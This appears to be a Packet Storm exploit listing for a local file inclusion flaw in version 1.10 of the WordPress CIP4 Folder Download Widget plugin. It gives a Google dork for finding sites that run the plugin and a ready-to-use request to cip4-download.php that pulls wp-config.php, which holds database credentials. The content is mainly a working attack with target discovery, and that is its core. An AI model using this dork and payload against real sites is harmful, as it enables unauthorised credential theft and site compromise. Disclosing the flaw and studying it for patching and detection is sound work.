WordPress CIP4 Folder Download plugin version 1.10 suffers from a local file inclusion vulnerability.
1af1d5a2b4b746275a381593e49a5c3be6de4731e7ecb543c4f8b9e295342115# Exploit Title: CIP4 Folder Download Widget LFI
# Google Dork: index of :/cip4-folder-download-widget
# Date: 13-01-2015
# Exploit Author: Ben khlifa Fahmi (XTnR3v0lt)
# Vendor Homepage: https://community.cip4.org
# Software Link: https://wordpress.org/plugins/cip4-folder-download-widget/
# Version: 1.10
# Tested on: Ubuntu 14.04
Dork :
inurl:/wp-content/plugins/cip4-folder-download-widget/
Exploit :
https://localhost/[wordpress]/wp-content/plugins/cip4-folder-download-widget/cip4-download.php?target=wp-config.php&info=wp-config.php
Ben khlifa Fahmi - Founder & CEO of Tunisian Cyber Army
Greetz to : Joseph - Michou - hackerXben - RaisoMos - Lola - All muslim hackers world wide
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed